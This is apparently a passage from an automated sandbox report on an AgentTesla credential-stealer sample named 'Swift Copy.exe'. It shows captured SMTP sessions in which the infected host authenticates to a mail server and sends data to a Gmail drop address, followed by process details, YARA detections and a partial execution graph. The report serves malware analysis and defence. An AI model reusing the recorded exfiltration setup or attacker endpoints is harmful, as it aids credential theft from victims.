                                            Jul 26, 2024 15:12:59.421844006 CEST58749742148.66.136.151192.168.2.4220-sg2plzcpnl505494.prod.sin2.secureserver.net ESMTP Exim 4.96.2 #2 Fri, 26 Jul 2024 06:12:59 -0700
                                            220-We do not authorize the use of this system to transport unsolicited,
                                            220 and/or bulk e-mail.
                                            Jul 26, 2024 15:12:59.422115088 CEST49742587192.168.2.4148.66.136.151EHLO 849224
                                            Jul 26, 2024 15:12:59.756001949 CEST58749742148.66.136.151192.168.2.4250-sg2plzcpnl505494.prod.sin2.secureserver.net Hello 849224 [8.46.123.33]
                                            250-SIZE 52428800
                                            250-8BITMIME
                                            250-PIPELINING
                                            250-PIPECONNECT
                                            250-AUTH PLAIN LOGIN
                                            250-STARTTLS
                                            250 HELP
                                            Jul 26, 2024 15:12:59.758318901 CEST49742587192.168.2.4148.66.136.151AUTH login aW5mb0BtYWhlc2gtZW50LmNvbQ==
                                            Jul 26, 2024 15:13:00.091757059 CEST58749742148.66.136.151192.168.2.4334 UGFzc3dvcmQ6
                                            Jul 26, 2024 15:13:00.432651043 CEST58749742148.66.136.151192.168.2.4235 Authentication succeeded
                                            Jul 26, 2024 15:13:00.434478045 CEST49742587192.168.2.4148.66.136.151MAIL FROM:<info@mahesh-ent.com>
                                            Jul 26, 2024 15:13:00.767920971 CEST58749742148.66.136.151192.168.2.4250 OK
                                            Jul 26, 2024 15:13:00.768071890 CEST49742587192.168.2.4148.66.136.151RCPT TO:<obtxxxtf@gmail.com>
                                            Jul 26, 2024 15:13:01.146365881 CEST58749742148.66.136.151192.168.2.4250 Accepted
                                            Jul 26, 2024 15:13:01.157783031 CEST49742587192.168.2.4148.66.136.151DATA
                                            Jul 26, 2024 15:13:01.494940042 CEST58749742148.66.136.151192.168.2.4354 Enter message, ending with "." on a line by itself
                                            Jul 26, 2024 15:13:08.704847097 CEST58749743148.66.136.151192.168.2.4421 Too many concurrent SMTP connections from this IP address; please try again later.
                                            Jul 26, 2024 15:13:28.454547882 CEST58749744148.66.136.151192.168.2.4220-sg2plzcpnl505494.prod.sin2.secureserver.net ESMTP Exim 4.96.2 #2 Fri, 26 Jul 2024 06:13:28 -0700
                                            220-We do not authorize the use of this system to transport unsolicited,
                                            220 and/or bulk e-mail.
                                            Jul 26, 2024 15:13:28.454696894 CEST49744587192.168.2.4148.66.136.151EHLO 849224
                                            Jul 26, 2024 15:13:28.807077885 CEST58749744148.66.136.151192.168.2.4250-sg2plzcpnl505494.prod.sin2.secureserver.net Hello 849224 [8.46.123.33]
                                            250-SIZE 52428800
                                            250-8BITMIME
                                            250-PIPELINING
                                            250-PIPECONNECT
                                            250-AUTH PLAIN LOGIN
                                            250-STARTTLS
                                            250 HELP
                                            Jul 26, 2024 15:13:28.808612108 CEST49744587192.168.2.4148.66.136.151AUTH login aW5mb0BtYWhlc2gtZW50LmNvbQ==
                                            Jul 26, 2024 15:13:29.162256956 CEST58749744148.66.136.151192.168.2.4334 UGFzc3dvcmQ6
                                            Jul 26, 2024 15:13:29.521091938 CEST58749744148.66.136.151192.168.2.4235 Authentication succeeded
                                            Jul 26, 2024 15:13:29.521363974 CEST49744587192.168.2.4148.66.136.151MAIL FROM:<info@mahesh-ent.com>
                                            Jul 26, 2024 15:13:29.873647928 CEST58749744148.66.136.151192.168.2.4250 OK
                                            Jul 26, 2024 15:13:29.873780012 CEST49744587192.168.2.4148.66.136.151RCPT TO:<obtxxxtf@gmail.com>
                                            Jul 26, 2024 15:13:30.290083885 CEST58749744148.66.136.151192.168.2.4250 Accepted
                                            Jul 26, 2024 15:13:30.290502071 CEST49744587192.168.2.4148.66.136.151DATA
                                            Jul 26, 2024 15:13:30.674309015 CEST58749744148.66.136.151192.168.2.4354 Enter message, ending with "." on a line by itself
                                            Jul 26, 2024 15:13:30.696455956 CEST49744587192.168.2.4148.66.136.151.
                                            Jul 26, 2024 15:13:42.116786003 CEST58749745148.66.136.151192.168.2.4421 Too many concurrent SMTP connections from this IP address; please try again later.
                                            Jul 26, 2024 15:13:44.986160040 CEST58749746148.66.136.151192.168.2.4220-sg2plzcpnl505494.prod.sin2.secureserver.net ESMTP Exim 4.96.2 #2 Fri, 26 Jul 2024 06:13:44 -0700
                                            220-We do not authorize the use of this system to transport unsolicited,
                                            220 and/or bulk e-mail.
                                            Jul 26, 2024 15:13:44.987668037 CEST49746587192.168.2.4148.66.136.151EHLO 849224
                                            Jul 26, 2024 15:13:45.344765902 CEST58749746148.66.136.151192.168.2.4250-sg2plzcpnl505494.prod.sin2.secureserver.net Hello 849224 [8.46.123.33]
                                            250-SIZE 52428800
                                            250-8BITMIME
                                            250-PIPELINING
                                            250-PIPECONNECT
                                            250-AUTH PLAIN LOGIN
                                            250-STARTTLS
                                            250 HELP
                                            Jul 26, 2024 15:13:45.345196009 CEST49746587192.168.2.4148.66.136.151AUTH login aW5mb0BtYWhlc2gtZW50LmNvbQ==
                                            Jul 26, 2024 15:13:45.884818077 CEST58749746148.66.136.151192.168.2.4334 UGFzc3dvcmQ6
                                            Jul 26, 2024 15:13:46.454534054 CEST58749746148.66.136.151192.168.2.4235 Authentication succeeded
                                            Jul 26, 2024 15:13:46.454694986 CEST49746587192.168.2.4148.66.136.151MAIL FROM:<info@mahesh-ent.com>
                                            Jul 26, 2024 15:13:46.804505110 CEST58749746148.66.136.151192.168.2.4250 OK
                                            Jul 26, 2024 15:13:46.806603909 CEST49746587192.168.2.4148.66.136.151RCPT TO:<obtxxxtf@gmail.com>
                                            Jul 26, 2024 15:13:47.195988894 CEST58749746148.66.136.151192.168.2.4250 Accepted
                                            Jul 26, 2024 15:13:47.198510885 CEST49746587192.168.2.4148.66.136.151DATA
                                            Jul 26, 2024 15:13:47.548515081 CEST58749746148.66.136.151192.168.2.4354 Enter message, ending with "." on a line by itself
                                            Jul 26, 2024 15:13:47.572932005 CEST49746587192.168.2.4148.66.136.151.
                                            Jul 26, 2024 15:13:53.540426016 CEST58749747148.66.136.151192.168.2.4421 Too many concurrent SMTP connections from this IP address; please try again later.
                                            Jul 26, 2024 15:14:11.292802095 CEST58749748148.66.136.151192.168.2.4220-sg2plzcpnl505494.prod.sin2.secureserver.net ESMTP Exim 4.96.2 #2 Fri, 26 Jul 2024 06:14:11 -0700
                                            220-We do not authorize the use of this system to transport unsolicited,
                                            220 and/or bulk e-mail.
                                            Jul 26, 2024 15:14:11.294531107 CEST49748587192.168.2.4148.66.136.151EHLO 849224
                                            Jul 26, 2024 15:14:11.646125078 CEST58749748148.66.136.151192.168.2.4250-sg2plzcpnl505494.prod.sin2.secureserver.net Hello 849224 [8.46.123.33]
                                            250-SIZE 52428800
                                            250-8BITMIME
                                            250-PIPELINING
                                            250-PIPECONNECT
                                            250-AUTH PLAIN LOGIN
                                            250-STARTTLS
                                            250 HELP
                                            Jul 26, 2024 15:14:11.646598101 CEST49748587192.168.2.4148.66.136.151AUTH login aW5mb0BtYWhlc2gtZW50LmNvbQ==
                                            Jul 26, 2024 15:14:12.191993952 CEST58749748148.66.136.151192.168.2.4334 UGFzc3dvcmQ6
                                            Jul 26, 2024 15:14:12.548180103 CEST58749748148.66.136.151192.168.2.4235 Authentication succeeded
                                            Jul 26, 2024 15:14:12.548379898 CEST49748587192.168.2.4148.66.136.151MAIL FROM:<info@mahesh-ent.com>
                                            Jul 26, 2024 15:14:12.900966883 CEST58749748148.66.136.151192.168.2.4250 OK
                                            Jul 26, 2024 15:14:12.901379108 CEST49748587192.168.2.4148.66.136.151RCPT TO:<obtxxxtf@gmail.com>
                                            Jul 26, 2024 15:14:13.356904030 CEST58749748148.66.136.151192.168.2.4250 Accepted
                                            Jul 26, 2024 15:14:13.357285023 CEST49748587192.168.2.4148.66.136.151DATA
                                            Jul 26, 2024 15:14:13.749298096 CEST58749748148.66.136.151192.168.2.4354 Enter message, ending with "." on a line by itself
                                            Jul 26, 2024 15:14:13.755971909 CEST49748587192.168.2.4148.66.136.151661mt/
                                            bWqLsSOGWVVaRSg+ZVMZLHJOMMBxgj1AOrorl4dY1GcxFTtFxtt0+QfLMpHmH9X4/wBi
                                            uooAKKKKACiiigAooooAKKKKACiiigAooooAKhurhLWEzSBvLU/MVGdo9T7DvU1Nd0jj
                                            Z5GCooyzMcAD1NACqwZQykEHkEd6ivP+PKf/AK5t/KqekI48541Mdi5BgiYcj1I/uqey
                                            9vbOBcvP+PKf/rm38qbA8js/9SKmqG0/1AqevpYfCj52fxMSiiirEJRRRQMTFFLSUAFJ
                                            9aWigYlFFFABSUtJSGJRRR/OmMOaKKKQCUUtJ+NAB70lLRQMTiiiimAlHSlooASkpfxo
                                            oGJ2ooooAO1JS0c0DEpOtL7UUAJRS9TSfjQMKPyo9qKQB+dJS0lMAoo96DQMKOaKKACk
                                            9qXn05pKACjrxRRQAUlLRQMSilpOKAD3ooo/GgBKPalo96AOlrY8L5/tcY67GrHpyuyH
                                            KMVPqDisasOeDiup5VCoqVRTfQ1tH0S6vbt9RvpXS5iuQdjDrtIJz+HSuf8AEtjJP4hv
                                            ZFPBk/pVwSzuwVXkZj0AJJNRGQMN5bI9a4fqSnL967rsess2qUVfD6PvozF/syb1/Sj+
                                            zJvX9K2yCGZSCrKcEEYINJn7vUbhlSR17cU/7Ow3b8WP+3sw/m/Bf5GMumSk8nitS2gW
                                            CMKKmoroo4WlQd4I4cXmOJxiSrSul/XQKKKK6ThCijDblXa25gCo2nLZ6Y9aEBkdURHZ
                                            2AKqFOWB6YHfNLmXcrll2NjS9ZaDENyS0XQN3X/EVdi8SokzpLE2wMQrxnORnjg/0rn3
                                            tbpGRXtLlWc4UGFgWOM4HHPANRSq0DlJkeJwM7ZFKnH0NcP1TDubmt2d6xmKhBRey7o6
                                            ++1W1l0m4khnDsCp2oxR+o/Gsn+2IPsNzEYpzNOm0vJIH+g7ccmsiWGaF1SW3mjZwSoa
                                            JgWwMnHHYVGp3BSqswYkAhSc4GT+Q5ohhaC1vcueOxMlypWT6WFooByiuAdj52tg4bHX
                                            B70V3p32PMaa3Ciigg7S2DtXGTjgZ9aHoCV9gro/DmqWVjYSRXM2xzKWA2seMAdh7VzZ
                                            yF3FWC8fNtOOc45/A/kamS0unjEiWlw6EZDLCxB/HFc1eEKsbN2OvDVKlCfNGN7o7T/h
                                            IdK/5+v/ACG/+FH/AAkOlf8AP1/5Df8AwriGilW3W4aCVYWAIkaNgpz05xihY5XheZIZ
                                            XiTO51QlVx1yQMCuX6lT35jt/tGre3J+Z2//AAkOlf8AP1/5Df8Awrm/Ed5b32oJLbSb
                                            0EQUnBHOSe/1rJByQArZK7wNpyVxnP0xzQpLHCq5OzzMbT93+99PetKWGhSmpqRlXxlS
                                            tTcHDcKKKWu88wSiiigApKWigBKKWkoAKKKKYwooopAFFFFABRRRQAlFLSUAFFFFMAoz
                                            RSUAO3etHyntTaWmAbR2NIVIpaMmgY2kqTOeopMKe+KLBcZRTth7c0hBFIY2iiigYUUU
                                            UAFJS0lAwooooAKKKKAEopaKAEopaSgApKWkoGFFFBoAKSlooGJRRRTAStnwr/yG0/3G
                                            /lWPWx4V/wCQ2n+438q58T/BkdOF/jRO5ooqDyJf+fyb8k/+Jr54+iJ6Kg8iX/n8m/JP
                                            /iaPIl/5/JvyT/4mgCeioPIl/wCfyb8k/wDiaPIl/wCfyb8k/wDiaAJ6Kg8iX/n8m/JP
                                            /iaPIl/5/JvyT/4mgCeioPIl/wCfyb8k/wDiaPIl/wCfyb8k/wDiaAJ6Kg8iX/n8m/JP
                                            /iaPIl/5/JvyT/4mgCeioPIl/wCfyb8k/wDiaPIl/wCfyb8k/wDiaAJ6Kg8iX/n8m/JP
                                            /iaPIl/5/JvyT/4mgCeioPIl/wCfyb8k/wDiaPIl/wCfyb8k/wDiaAJ6Kg8iX/n8m/JP
                                            /iaPIl/5/JvyT/4mgCeo54IrhAkyB1DBtp6ZHIz60zyJf+fyb8k/+Jo8iX/n8m/JP/ia
                                            AJ6hvP8Ajyn/AOubfypY4nRstPJIMdGC/wBAKS8/48p/+ubfyoA8ks/9QKmqGz/1Aqev
                                            pofCj52fxMSiiirJEopaSgYlFLSUDEopaSgBKKWkoGFJ2paT6CgApKdSUDEooooGFJS0
                                            UgE/WiiigYUlLzikpgBooooASiiigYn50Up96Q0AFB96KKAEo/OlpKBh9MUlLRQMT86K
                                            M8UUAH4UlL1ooASjpRRg/jQAneloooGFJ7Gl+lJQAUdO9LSUAFH4UUUAHtR+VH1ooGJR
                                            RR+VACe1LR2o5oA6WiiipPFGSySQW89xHdxWkihYoZJQ5G9jk/dVj90Ht3FRzB1a+FpZ
                                            nUQxilijQso8qTJZxjDYUjbk8DuKfLao6fapIsoH8veem7GcVA2m2rMSYwCfSuGdGc5u
                                            cZHp0sTTp04wnDz+ZdO46telLNrzdqLxzkOwFtGMYY4IxnLfM2R8tV7Z2fT7CY2bzWot
                                            7kve5YCIK8hXpwCeOoOegxUI0y1HSPFJ/ZtovlnysCQFl5HIBIP6g1j9VqJKPP6fcbrG
                                            0XzPk9S5I6f2bbyRW10++GOT7UISYixxuBfeRwSRjaCCOvqtQRWUMUg8pCGY4Crzk1OC
                                            D0rtowlC6k7s83EVIVGnCNkgooorc5yncPLHpk14HAktI5LZeeSzn5D+AaT/AL5FTRWN
                                            /LJbYtbho5LS2RH8tthby1H3sY60S2sMsgd0ywqP+z7f5sKRu64rh+rSU+dP+v6Z6f1y
                                            EqXs5L+tP8iUWl+urwQpa3kdrDFcRQiSBl86QxPluR1J6D0AqrZyXFlFp9ldM0N2GuGh
                                            Wf5TDmP5NwP3cvyM/XvmpP7OtymzadvpTksbdFICZz61l9Sm93/Wv+Zr/aEFtHYjtYJb
                                            V9NE6XdvdzNcRGK5IUMxiwrAEDGWYDOT060+wEtm2m29/DMkha7maFso/l+Rjv0yQcfS
                                            kGnWwz+7zn1pP7NtemzP1oeDm767jjmFJWtHb9R8fmM8l4CZbVo/MhdBtVYgQNuM8FSQ
                                            COTnnnOasyLJEWEkZXbIYjkg/MACRwfcVTbTrYn7hH0NPhsoYX3IDn3NdVKFSmlG6sji
                                            rVKVVudndlio2SWWY2sZGbqNoVycAP8AeT/x4AfjUlMliSZCjjINa1Ic8XEwo1PZzUux
                                            WQXV8dWSzjmuEiuLaKMRIWOxFdc4HY9fxqe7sdQjsXe1s7xp7pWjDpAxEUY4bnHBbp9M
                                            +tRmwtzt+TG3pikFhAGLAHJ71xrCzUXG+56EsbTlNT5dloDR3dpcpfSLMlj/AGYiNIyl
                                            UkzCAFB7ktjgeme1Njhluttw4uvsK2A8ueAgJC4iy6ucEAl8ggkE7vcUq6dbK24JTnsL
                                            Z23FKj6nP+b+tf8AM0/tCns4/wBaf5DIvtH7nU2R/sK6ZgzY+TcINm3P97fxjrT5386z
                                            tI7csHhtLeS6jAy0ieWu1ge6rzke+eezTp1sTnZ+FH9nWuCPL601g58ylf8ArX/MHmFN
                                            xceXf/gf5FzyplkMZhbcHeMjK/eVdzDr2FMVg6hh0NVRptsDnDfnVpVCqFHQV3Q5/tnm
                                            VPZ/YuOpKWitDISilpKACiiigAooooASiiigYUUUUwCiiigAooooASilopAJRS0lABSU
                                            tFMYlFLSUAFFFFABml3H60lFMB3ynqKTYOxpKKAEKEUmKduIpdwPWiw7kdFSYU+1IUPb
                                            mlYLjMUUpBHUUlAwpKWigBKKKKBhSUtFACUUtJQAlFLSUxhRRRQMKSlpKACtjwr/AMht
                                            P9xv5Vj1seFf+Q2n+438q58T/BkdGF/jRO5rIi1S/liSVNKYq6hgd7dD/wABrXrBjae0
                                            tIY5rR1KoF5kjGcDnHzV4dJRd+Y92q5K3KSXGs3dqm+bTdgwSN0hGcfVa2q5q/S61G0W
                                            O2tWYruz+8j43AY6N7GulqqqgkuUmjKbb5zEj1u5LGaaxRbL7S1t5qT7nUhygZlKgAE+
                                            hOM1e/tK1jVPtV3aQtJI0aDzwdxBxgZxz6jseKzoNL1Aq9nOLZLQ3TXBkSRmdx5hcLtK
                                            gLzjJyenvkNGk6hC8bWxhSXz5XM4mYFY3k3bdmwhsj1xg9D3rA6DXXULJ7g28d3A84BP
                                            lLIC3BweOvBBFV7LWbO4trJ5p4bee7jV44HlG457AHBP5VkaTZXNzJu8u3S3iv7ibzAx
                                            8xm3OuCMYHXrnoMYoOg6kYLC3aaJordIRxPIgVkbLHaBh84GN3THSgDo1uYHERWeNhL/
                                            AKshgd/GePXimfbbQ3bWguoftKruaHzBvA9SvXFZeixLLqFzcRSpLZRMy2zLyMsQ0mD3
                                            w3H5ikvNJvLqe/ijdLa0uonVsSly7lQA20qNuMdm59O4ALM3iLSIvs5/tC2dZ5TErpMh
                                            UEDJyc/QfUj1pbLW7PUArWc8Dr5zQvumAORnoBnOduR045rPg0e+iFvKtvAs8M6yMGvp
                                            phIAjL951JXG7gc1NFpN4skSsYBHDfSXKsHJLK4fgjbwQXHc0AalvqFjdO6W17bzMgDM
                                            scqsVB6E4PApiatpjwPOmo2rQoMvIJlKqM4yTnjkYrGbQXi0u2heW3hWDT5baV/4cttO
                                            egyvyknOKq2ay6vd388MVlMVjgRWtrphHvUseJQnJAIOMdwDQB1kMsU8KSwyJJG4yroQ
                                            Qw9QRT6r2KXMdlCl3KJbgKPMcdCfwA/kPoKsUAFFFFABRRRQAUUUUAFQ3n/HlP8A9c2/
                                            lU1Q3n/HlP8A9c2/lQB5JZ/6gVPUNn/qBU9fTw+FHzs/iYlJS0VRI2g0tFAxDRRRQAUl
                                            FBoGFJS0lACYopaSgYnvRS0fWgBKTFLR05o
                                            Jul 26, 2024 15:14:17.321137905 CEST58749749148.66.136.151192.168.2.4421 Too many concurrent SMTP connections from this IP address; please try again later.
                                            Jul 26, 2024 15:14:29.511148930 CEST58749750148.66.136.151192.168.2.4220-sg2plzcpnl505494.prod.sin2.secureserver.net ESMTP Exim 4.96.2 #2 Fri, 26 Jul 2024 06:14:29 -0700
                                            220-We do not authorize the use of this system to transport unsolicited,
                                            220 and/or bulk e-mail.
                                            Jul 26, 2024 15:14:29.512011051 CEST49750587192.168.2.4148.66.136.151EHLO 849224
                                            Jul 26, 2024 15:14:29.858998060 CEST58749750148.66.136.151192.168.2.4250-sg2plzcpnl505494.prod.sin2.secureserver.net Hello 849224 [8.46.123.33]
                                            250-SIZE 52428800
                                            250-8BITMIME
                                            250-PIPELINING
                                            250-PIPECONNECT
                                            250-AUTH PLAIN LOGIN
                                            250-STARTTLS
                                            250 HELP
                                            Jul 26, 2024 15:14:29.859272003 CEST49750587192.168.2.4148.66.136.151AUTH login aW5mb0BtYWhlc2gtZW50LmNvbQ==
                                            Jul 26, 2024 15:14:30.207730055 CEST58749750148.66.136.151192.168.2.4334 UGFzc3dvcmQ6
                                            Jul 26, 2024 15:14:30.563241005 CEST58749750148.66.136.151192.168.2.4235 Authentication succeeded
                                            Jul 26, 2024 15:14:30.563613892 CEST49750587192.168.2.4148.66.136.151MAIL FROM:<info@mahesh-ent.com>
                                            Jul 26, 2024 15:14:31.699464083 CEST58749751148.66.136.151192.168.2.4220-sg2plzcpnl505494.prod.sin2.secureserver.net ESMTP Exim 4.96.2 #2 Fri, 26 Jul 2024 06:14:31 -0700
                                            220-We do not authorize the use of this system to transport unsolicited,
                                            220 and/or bulk e-mail.
                                            Jul 26, 2024 15:14:31.699718952 CEST49751587192.168.2.4148.66.136.151EHLO 849224
                                            Jul 26, 2024 15:14:32.039335966 CEST58749751148.66.136.151192.168.2.4250-sg2plzcpnl505494.prod.sin2.secureserver.net Hello 849224 [8.46.123.33]
                                            250-SIZE 52428800
                                            250-8BITMIME
                                            250-PIPELINING
                                            250-PIPECONNECT
                                            250-AUTH PLAIN LOGIN
                                            250-STARTTLS
                                            250 HELP
                                            Jul 26, 2024 15:14:32.039583921 CEST49751587192.168.2.4148.66.136.151AUTH login aW5mb0BtYWhlc2gtZW50LmNvbQ==
                                            Jul 26, 2024 15:14:32.372971058 CEST58749751148.66.136.151192.168.2.4334 UGFzc3dvcmQ6
                                            Jul 26, 2024 15:14:32.712802887 CEST58749751148.66.136.151192.168.2.4235 Authentication succeeded
                                            Jul 26, 2024 15:14:32.713042974 CEST49751587192.168.2.4148.66.136.151MAIL FROM:<info@mahesh-ent.com>
                                            Jul 26, 2024 15:14:33.052014112 CEST58749751148.66.136.151192.168.2.4250 OK
                                            Jul 26, 2024 15:14:33.054569960 CEST49751587192.168.2.4148.66.136.151RCPT TO:<obtxxxtf@gmail.com>
                                            Jul 26, 2024 15:14:33.445852041 CEST58749751148.66.136.151192.168.2.4250 Accepted
                                            Jul 26, 2024 15:14:33.446099997 CEST49751587192.168.2.4148.66.136.151DATA
                                            Jul 26, 2024 15:14:33.781507015 CEST58749751148.66.136.151192.168.2.4354 Enter message, ending with "." on a line by itself
                                            Jul 26, 2024 15:14:34.769088984 CEST58749752148.66.136.151192.168.2.4421 Too many concurrent SMTP connections from this IP address; please try again later.
                                            Jul 26, 2024 15:14:39.332099915 CEST58749753148.66.136.151192.168.2.4421 Too many concurrent SMTP connections from this IP address; please try again later.
                                            Jul 26, 2024 15:14:49.430870056 CEST58749757148.66.136.151192.168.2.4220-sg2plzcpnl505494.prod.sin2.secureserver.net ESMTP Exim 4.96.2 #2 Fri, 26 Jul 2024 06:14:49 -0700
                                            220-We do not authorize the use of this system to transport unsolicited,
                                            220 and/or bulk e-mail.
                                            Jul 26, 2024 15:14:49.434705973 CEST49757587192.168.2.4148.66.136.151EHLO 849224
                                            Jul 26, 2024 15:14:49.857253075 CEST58749757148.66.136.151192.168.2.4250-sg2plzcpnl505494.prod.sin2.secureserver.net Hello 849224 [8.46.123.33]
                                            250-SIZE 52428800
                                            250-8BITMIME
                                            250-PIPELINING
                                            250-PIPECONNECT
                                            250-AUTH PLAIN LOGIN
                                            250-STARTTLS
                                            250 HELP
                                            Jul 26, 2024 15:14:49.859363079 CEST49757587192.168.2.4148.66.136.151AUTH login aW5mb0BtYWhlc2gtZW50LmNvbQ==
                                            Jul 26, 2024 15:14:50.218528032 CEST58749757148.66.136.151192.168.2.4334 UGFzc3dvcmQ6
                                            Jul 26, 2024 15:14:50.578948975 CEST58749757148.66.136.151192.168.2.4235 Authentication succeeded
                                            Jul 26, 2024 15:14:50.579129934 CEST49757587192.168.2.4148.66.136.151MAIL FROM:<info@mahesh-ent.com>
                                            Jul 26, 2024 15:14:50.931519032 CEST58749757148.66.136.151192.168.2.4250 OK
                                            Jul 26, 2024 15:14:50.931696892 CEST49757587192.168.2.4148.66.136.151RCPT TO:<obtxxxtf@gmail.com>
                                            Jul 26, 2024 15:14:51.321224928 CEST58749757148.66.136.151192.168.2.4250 Accepted
                                            Jul 26, 2024 15:14:51.321510077 CEST49757587192.168.2.4148.66.136.151DATA
                                            Jul 26, 2024 15:14:51.687593937 CEST58749757148.66.136.151192.168.2.4354 Enter message, ending with "." on a line by itself
                                            Jul 26, 2024 15:15:05.335576057 CEST58749757148.66.136.151192.168.2.4250 OK id=1sXKmZ-001WmV-1e
                                            Jul 26, 2024 15:15:06.559429884 CEST49757587192.168.2.4148.66.136.151QUIT
                                            Jul 26, 2024 15:15:07.109867096 CEST58749757148.66.136.151192.168.2.4221 sg2plzcpnl505494.prod.sin2.secureserver.net closing connection
                                            Jul 26, 2024 15:15:07.999610901 CEST58749758148.66.136.151192.168.2.4220-sg2plzcpnl505494.prod.sin2.secureserver.net ESMTP Exim 4.96.2 #2 Fri, 26 Jul 2024 06:15:07 -0700
                                            220-We do not authorize the use of this system to transport unsolicited,
                                            220 and/or bulk e-mail.

                                            Click to jump to process

                                            Click to jump to process

                                            Click to dive into process behavior distribution

                                            Click to jump to process

                                            Target ID:0
                                            Start time:09:10:56
                                            Start date:26/07/2024
                                            Path:C:\Users\user\Desktop\Swift Copy.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\Swift Copy.exe"
                                            Imagebase:0xd70000
                                            File size:1'294'336 bytes
                                            MD5 hash:2AD0A14A883597C8707276C3002D85DA
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1678514155.0000000000EE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1678514155.0000000000EE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000000.00000002.1678514155.0000000000EE0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                            Reputation:low
                                            Has exited:true

                                            Target ID:1
                                            Start time:09:10:57
                                            Start date:26/07/2024
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\Swift Copy.exe"
                                            Imagebase:0xee0000
                                            File size:45'984 bytes
                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4137346233.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.4137346233.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4142550881.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.4142550881.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:high
                                            Has exited:false

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:3.1%
                                              Dynamic/Decrypted Code Coverage:1%
                                              Signature Coverage:3.3%
                                              Total number of Nodes:1891
                                              Total number of Limit Nodes:33
                                              execution_graph 95348 da90fa 95349 da9107 95348->95349 95353 da911f 95348->95353 95405 d9f2d9 20 API calls __dosmaperr 95349->95405 95351 da910c 95406 da27ec 26 API calls _strftime 95351->95406 95354 da917a 95353->95354 95362 da9117 95353->95362 95407 dafdc4 21 API calls 2 library calls 95353->95407 95368 d9d955 95354->95368 95357 da9192 95375 da8c32 95357->95375 95359 da9199 95360 d9d955 __fread_nolock 26 API calls 95359->95360 95359->95362 95361 da91c5 95360->95361 95361->95362 95363 d9d955 __fread_nolock 26 API calls 95361->95363 95364 da91d3 95363->95364 95364->95362 95365 d9d955 __fread_nolock 26 API calls 95364->95365 95366 da91e3 95365->95366 95367 d9d955 __fread_nolock 26 API calls 95366->95367 95367->95362 95369 d9d961 95368->95369 95370 d9d976 95368->95370 95408 d9f2d9 20 API calls __dosmaperr 95369->95408 95370->95357 95372 d9d966 95409 da27ec 26 API calls _strftime 95372->95409 95374 d9d971 95374->95357 95376 da8c3e ___BuildCatchObject 95375->95376 95377 da8c5e 95376->95377 95378 da8c46 95376->95378 95379 da8d24 95377->95379 95383 da8c97 95377->95383 95476 d9f2c6 20 API calls __dosmaperr 95378->95476 95483 d9f2c6 20 API calls __dosmaperr 95379->95483 95382 da8c4b 95477 d9f2d9 20 API calls __dosmaperr 95382->95477 95386 da8cbb 95383->95386 95387 da8ca6 95383->95387 95384 da8d29 95484 d9f2d9 20 API calls __dosmaperr 95384->95484 95410 da5147 EnterCriticalSection 95386->95410 95478 d9f2c6 20 API calls __dosmaperr 95387->95478 95391 da8cb3 95485 da27ec 26 API calls _strftime 95391->95485 95392 da8cab 95479 d9f2d9 20 API calls __dosmaperr 95392->95479 95393 da8cc1 95396 da8cdd 95393->95396 95397 da8cf2 95393->95397 95394 da8c53 __fread_nolock 95394->95359 95480 d9f2d9 20 API calls __dosmaperr 95396->95480 95411 da8d45 95397->95411 95401 da8ced 95482 da8d1c LeaveCriticalSection __wsopen_s 95401->95482 95402 da8ce2 95481 d9f2c6 20 API calls __dosmaperr 95402->95481 95405->95351 95406->95362 95407->95354 95408->95372 95409->95374 95410->95393 95412 da8d6f 95411->95412 95413 da8d57 95411->95413 95415 da90d9 95412->95415 95418 da8db4 95412->95418 95495 d9f2c6 20 API calls __dosmaperr 95413->95495 95517 d9f2c6 20 API calls __dosmaperr 95415->95517 95416 da8d5c 95496 d9f2d9 20 API calls __dosmaperr 95416->95496 95421 da8dbf 95418->95421 95422 da8d64 95418->95422 95429 da8def 95418->95429 95420 da90de 95518 d9f2d9 20 API calls __dosmaperr 95420->95518 95497 d9f2c6 20 API calls __dosmaperr 95421->95497 95422->95401 95425 da8dcc 95519 da27ec 26 API calls _strftime 95425->95519 95426 da8dc4 95498 d9f2d9 20 API calls __dosmaperr 95426->95498 95430 da8e08 95429->95430 95431 da8e4a 95429->95431 95432 da8e2e 95429->95432 95430->95432 95435 da8e15 95430->95435 95502 da3820 21 API calls __dosmaperr 95431->95502 95499 d9f2c6 20 API calls __dosmaperr 95432->95499 95434 da8e33 95500 d9f2d9 20 API calls __dosmaperr 95434->95500 95486 daf89b 95435->95486 95439 da8e61 95503 da29c8 95439->95503 95440 da8e3a 95501 da27ec 26 API calls _strftime 95440->95501 95441 da8fb3 95444 da9029 95441->95444 95447 da8fcc GetConsoleMode 95441->95447 95446 da902d ReadFile 95444->95446 95445 da8e6a 95448 da29c8 _free 20 API calls 95445->95448 95449 da90a1 GetLastError 95446->95449 95450 da9047 95446->95450 95447->95444 95451 da8fdd 